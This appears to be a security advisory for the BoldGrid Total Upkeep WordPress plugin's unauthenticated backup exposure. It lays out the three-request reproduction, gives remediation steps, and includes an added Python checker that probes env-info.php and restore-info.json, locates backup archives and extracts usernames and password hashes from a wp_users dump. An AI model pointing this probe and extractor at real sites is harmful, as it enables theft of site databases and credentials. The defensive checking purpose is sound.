BoldGrid Total Upkeep WordPress Plugin Sensitive Information Exposure Vulnerability

Vulnerability

A sensitive information exposure vulnerability has been identified in the Total Upkeep WordPress Backup Plugin by BoldGrid, affecting all versions up to and including 1.14.9. The plugin ships two files, env-info.php and restore-info.json, that are reachable from the web without any access control. Because both answer unauthenticated requests, an attacker can learn details of the server environment, discover where the most recent backup archive is stored and download it.

Impact

Exploitation gives an unauthenticated attacker the backup archives the plugin has produced. A full-site backup normally contains the WordPress database, so the exposure covers everything stored there, including the wp_users table with usernames, e-mail addresses and password hashes. Any archive downloaded before the plugin is updated remains in the attacker's hands.

Reproduction

Reproduction takes three unauthenticated requests. First, request env-info.php, which returns information about the server environment. Second, request restore-info.json, which identifies the most recent backup file. Third, download that backup file. If the archive contains the SQL dump of the site database, it can be parsed for the wp_users rows; the user_pass column holds password hashes rather than plaintext passwords, so the attacker cracks them offline, but the usernames and hashes must be treated as compromised regardless.
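The following checker implements the three steps above so a site owner can confirm whether an install is exposed and what a downloaded dump would give away. It is an added example written for this page, not code from the advisory or from BoldGrid. The file locations under PLUGIN_DIR, the contents of restore-info.json and the env-info.php output, and the SQL dump are all assumptions or constructed samples: the advisory names the two files but gives neither their path nor their format, so the JSON walk looks only at values and ignores key names. The fetcher is injected so the check runs offline; wrap urllib or requests in it for a live probe.

```python
import json
import re
from typing import Any, Callable, Dict, List, Tuple

# Assumed location of the two files (the advisory names them, not their path).
PLUGIN_DIR = "/wp-content/plugins/boldgrid-backup/cli"
ENV_INFO_PATH = PLUGIN_DIR + "/env-info.php"
RESTORE_INFO_PATH = PLUGIN_DIR + "/restore-info.json"

# A fetcher maps a URL to (HTTP status, body). Injected so tests run offline.
Fetcher = Callable[[str], Tuple[int, str]]

ARCHIVE_RE = re.compile(r"\.(?:zip|tar\.gz|tgz)$", re.IGNORECASE)


def find_archive_refs(node: Any) -> List[str]:
    """Walk arbitrary JSON and collect string values that name a backup archive.
    Key names are deliberately ignored: the advisory does not give the schema."""
    refs: List[str] = []
    if isinstance(node, str):
        if ARCHIVE_RE.search(node.strip()):
            refs.append(node.strip())
    elif isinstance(node, dict):
        for value in node.values():
            refs.extend(find_archive_refs(value))
    elif isinstance(node, list):
        for value in node:
            refs.extend(find_archive_refs(value))
    return refs


def check_site(base_url: str, fetch: Fetcher) -> Dict[str, Any]:
    """Probe both files anonymously and report what an unauthenticated client learns."""
    base = base_url.rstrip("/")
    report: Dict[str, Any] = {"env_info_exposed": False,
                              "restore_info_exposed": False, "archives": []}
    status, body = fetch(base + ENV_INFO_PATH)
    # The script answering an anonymous request with content is the finding;
    # its exact output format does not matter for the check.
    report["env_info_exposed"] = status == 200 and bool(body.strip())

    status, body = fetch(base + RESTORE_INFO_PATH)
    if status == 200:
        try:
            data = json.loads(body)
        except ValueError:
            data = None
        if data is not None:
            report["restore_info_exposed"] = True
            report["archives"] = find_archive_refs(data)
    return report


# INSERT for the users table, with or without a column list, up to the
# terminating semicolon at end of line.
USERS_INSERT_RE = re.compile(
    r"INSERT\s+INTO\s+`?\w*users`?\s*(?:\([^)]*\))?\s*VALUES\s*(.*?);\s*(?:\r?\n|$)",
    re.IGNORECASE | re.DOTALL)
# The first three wp_users columns are ID, user_login, user_pass; the rest of
# each row tuple is not needed to confirm credential exposure.
QUOTED = r"'((?:[^'\\]|\\.|'')*)'"
USER_ROW_RE = re.compile(r"\(\s*\d+\s*,\s*" + QUOTED + r"\s*,\s*" + QUOTED)


def extract_user_rows(sql_dump: str) -> List[Tuple[str, str]]:
    """Return (user_login, user_pass) pairs from a database dump. user_pass is a
    phpass/bcrypt hash, so exposure enables offline cracking, not direct login."""
    rows: List[Tuple[str, str]] = []
    for stmt in USERS_INSERT_RE.finditer(sql_dump):
        rows.extend((login, pw_hash) for login, pw_hash in USER_ROW_RE.findall(stmt.group(1)))
    return rows


# Constructed samples standing in for an unpatched site; not real plugin output.
SAMPLE_RESTORE_INFO = json.dumps({
    "site": "https://example.com",
    "latest": {"archive": "/var/www/html/wp-content/boldgrid_backup_example/backup-example-20200101.zip",
               "size": 12345678},
})
SAMPLE_SQL_DUMP = """
CREATE TABLE `wp_users` ( `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `user_login` varchar(60) NOT NULL DEFAULT '' );
INSERT INTO `wp_users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES
(1, 'admin', '$P$BexampleHashValueNotRealXXXXXXXXXXX', 'admin', 'admin@example.com', '', '2020-01-01 00:00:00', '', 0, 'Site Admin'),
(2, 'editor', '$P$BanotherFakeHashValueYYYYYYYYYYYYYY', 'editor', 'editor@example.com', '', '2020-01-02 00:00:00', '', 0, 'Editor (O''Brien)');
"""


def fake_vulnerable_fetch(url: str) -> Tuple[int, str]:
    if url.endswith(ENV_INFO_PATH):
        return 200, "php_version=7.4\nserver_software=Apache\n"  # constructed
    if url.endswith(RESTORE_INFO_PATH):
        return 200, SAMPLE_RESTORE_INFO
    return 404, ""


def fake_patched_fetch(url: str) -> Tuple[int, str]:
    return 404, ""


if __name__ == "__main__":
    print(check_site("https://example.com/", fake_vulnerable_fetch))
    print(check_site("https://example.com/", fake_patched_fetch))
    print(extract_user_rows(SAMPLE_SQL_DUMP))
```

A patched site yields no usable body for either path, so both flags stay false and the archive list is empty; against the constructed vulnerable responses the checker reports the archive path and, given the dump, the two username/hash pairs.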

Remediation

Users are advised to update the Total Upkeep WordPress Backup Plugin by BoldGrid to version 1.14.10 or later. Updating closes the exposure but does not recall archives that were already downloaded: site owners should check web server access logs for requests to env-info.php and restore-info.json and, if any are found, treat the database as disclosed and reset user passwords.

Added: Sep 1, 2025, 7:22 PM
Updated: Sep 1, 2025, 7:22 PM

Vulnerability Rating

Custom Algorithm
spread: 5.2
impact: 0.6
exploitability: 9.7
remediation: 7.7
relevance: 0.2
threat: 7.8
urgency: 2.9
incentive: 10.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.